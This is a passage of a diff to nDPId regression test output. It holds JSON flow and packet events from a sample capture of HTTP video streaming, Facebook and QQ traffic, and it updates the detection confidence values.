N0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 01244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"thread_ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000378725,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYCSkAAPwboUwo2qfp4HCMoyzYAUPnxUrTwfKXiUBhgH8mSAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7580000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7580000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7580000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":155,"packets-processed":155,"total-skipped-flows":0,"total-l4-payload-len":95867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":121,"global_ts_msec":1429000385363} 